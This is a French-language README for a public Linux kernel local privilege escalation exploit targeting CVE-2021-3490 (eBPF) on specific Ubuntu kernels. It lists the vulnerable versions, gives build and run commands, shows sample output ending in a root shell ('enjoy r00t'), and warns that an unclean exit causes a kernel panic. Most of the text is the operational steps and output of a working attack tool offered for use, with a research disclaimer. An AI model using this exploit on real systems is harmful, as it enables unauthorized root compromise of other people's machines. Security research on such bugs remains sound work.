
Exploitation de privilèges du noyau Linux basée sur eBPF ciblant CVE-2021-3490. Fournit un accès root shell sur les noyaux Ubuntu vulnérables 5.8.0-25 à 5.11.0-16.
Exploit LPE pour CVE-2021-3490. Testé sur Ubuntu 20.04.02 et 20.10 (Groovy Gorilla) avec les noyaux 5.8.0-25.26 à 5.8.0-52.58. et Ubuntu 21.04 (Hirsute Hippo) avec 5.11.0-16.17. La vulnérabilité a été découverte par Manfred Paul @_manfp et corrigée dans ce commit.
auteur: @chompie1337
À des fins éducatives et de recherche uniquement. Utilisation à vos risques et périls.
Pour compiler sous Ubuntu 20.04.02 et Ubuntu 20.10 (Groovy Gorilla) :
make groovy
Pour compiler sous Ubuntu 21.04 (Hirsute Hippo) :
make hirsute
Pour exécuter :
bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#
Remarque : Vous devez quitter proprement le shell root en tapant exit pour effectuer le nettoyage et éviter un kernel panic.
Consultez l'article technique Kernel Pwning with eBPF: a Love Story.